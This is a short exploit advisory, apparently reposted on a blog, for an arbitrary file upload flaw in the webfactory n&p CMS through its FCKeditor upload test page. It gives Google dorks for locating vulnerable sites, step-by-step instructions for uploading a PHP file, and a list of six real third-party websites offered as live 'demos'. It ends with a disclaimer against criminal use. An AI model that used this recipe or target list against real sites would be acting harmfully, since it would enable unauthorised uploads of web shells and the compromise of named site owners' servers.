[+] webfactory n&p CMS (fckeditor) Arbitrary File Upload Vulnerability
[+] Exploit Title : webfactory n&p CMS (FCKEDITOR)
[+] Exploit Author : Ashiyane Digital Security Team
[+] Vendor Homepage : http://www.n-p.at
[+] Google Dork 1 : inurl:pcms/content
[+] Google Dork 2 : by webfactory n&p
[+] Date: 2015/05/11
[+] Tested On : Windows 7 / Mozilla Firefox
[+] Version : All Version
[+] exploit => /admin/fckeditor/editor/filemanager/connectors/uploadtest.html
[+] first go to => http://site.com/[path]
[+] then =>
http://www.site.com/[path]/admin/fckeditor/editor/filemanager/connectors/uploadtest.html
[+] select => Select the "File Uploader"> php ... upload to : Uploaded
File URL:
[+] demos :
[+]
http://tirol-kaiserwinkl.at/admin/fckeditor/editor/filemanager/connectors/uploadtest.html
[+]
http://ruetz-sport.at/admin/fckeditor/editor/filemanager/connectors/uploadtest.html
[+]
http://berauergmbh.at/admin/fckeditor/editor/filemanager/connectors/uploadtest.html
[+]
http://creativceramic.at/admin/fckeditor/editor/filemanager/connectors/uploadtest.html
[+]
http://hauskofler.at/admin/fckeditor/editor/filemanager/connectors/uploadtest.html
[+]
http://romantica-geiger.at/admin/fckeditor/editor/filemanager/connectors/uploadtest.html
[+][+][+][+][+][+][+][+][+][+][+]
[+]Discovered By : Cyb3r_Dr4in[+]
[+][+][+][+][+][+][+][+][+][+][+]
source ; https://packetstormsecurity.com/files/131900/Webfactory-N-P-CMS-Arbitrary-File-Upload.html
0 komentar:
Post a Comment
I just a newbie and student, don't using this article for criminal